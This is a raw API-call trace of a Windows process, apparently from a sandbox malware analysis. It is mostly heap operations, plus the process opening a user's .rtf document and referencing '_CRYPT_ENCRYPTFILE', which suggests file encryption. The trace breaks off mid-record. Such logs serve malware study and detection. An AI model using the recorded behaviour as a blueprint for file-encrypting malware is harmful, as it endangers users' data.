[0082.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0082.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0082.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0082.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0082.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0082.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0082.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0082.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0082.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0082.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0082.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0082.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0082.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0082.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0082.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0082.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0082.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0082.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0082.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0082.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0082.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0082.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0082.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0082.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0082.168] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0082.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0082.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0082.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb0c0 [0082.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cb0c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0082.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0082.169] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0082.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0082.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0082.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0082.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0082.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0082.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0082.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0082.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0082.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0082.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0082.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0082.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0082.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0082.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0082.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0082.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0082.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0082.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0082.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0082.170] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\Zjnf2x96GL5i.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\zjnf2x96gl5i.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0082.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0082.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0082.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0082.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0082.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0082.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0082.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0082.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0082.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0082.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0082.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0082.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0082.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0082.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0082.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0082.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0082.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0082.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0082.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0082.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0082.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0082.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0082.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0082.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0082.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0082.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0082.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0082.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0082.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb480 | out: hHeap=0x1780000) returned 1 [0082.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0082.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0082.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0082.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0082.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb450 [0082.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0082.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb450 | out: hHeap=0x1780000) returned 1 [0082.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0082.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb480 | out: hHeap=0x1780000) returned 1 [0082.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb450 [0082.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3c0 [0082.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb390 [0082.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0082.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0082.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0082.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0082.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb390 [0082.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3f0 [0082.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0082.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0082.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb498 | out: hHeap=0x1780000) returned 1 [0082.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0082.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0082.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb480 | out: hHeap=0x1780000) returned 1 [0082.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0082.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0082.172] FreeLibrary (hLibModule=0x772d0000) returned 1 [0082.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0082.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0082.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0082.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0082.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0082.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0082.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0082.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0082.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0082.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0082.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0082.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0082.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0082.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0082.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0082.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0082.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0082.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0082.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0082.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0082.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0082.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0082.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0082.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0082.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0082.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0082.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0082.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0082.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0082.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0082.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0082.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0082.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0082.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0082.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0082.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0082.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0082.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4508 | out: hHeap=0x1780000) returned 1 [0082.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0082.173] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0082.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0082.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0082.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0082.174] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0082.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0082.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0082.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0082.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0082.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0082.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0082.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0082.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0082.174] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0082.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0082.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0082.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0082.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0082.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0082.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0082.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0082.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0082.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0082.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0082.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0082.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0082.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0082.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0082.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0082.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0082.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0082.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0082.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb450 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb420 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0082.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0082.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0082.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0082.176] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43cadc0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0082.176] CloseHandle (hObject=0x258) returned 1 [0082.176] FreeLibrary (hLibModule=0x772d0000) returned 1 [0082.176] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0082.176] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\Zjnf2x96GL5i.rtf", lpFindFileData=0x144e620 | out: lpFindFileData=0x144e620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23232a20, ftCreationTime.dwHighDateTime=0x1d5e463, ftLastAccessTime.dwLowDateTime=0xee16ecf0, ftLastAccessTime.dwHighDateTime=0x1d5ee4d, ftLastWriteTime.dwLowDateTime=0xee16ecf0, ftLastWriteTime.dwHighDateTime=0x1d5ee4d, nFileSizeHigh=0x0, nFileSizeLow=0x873a, 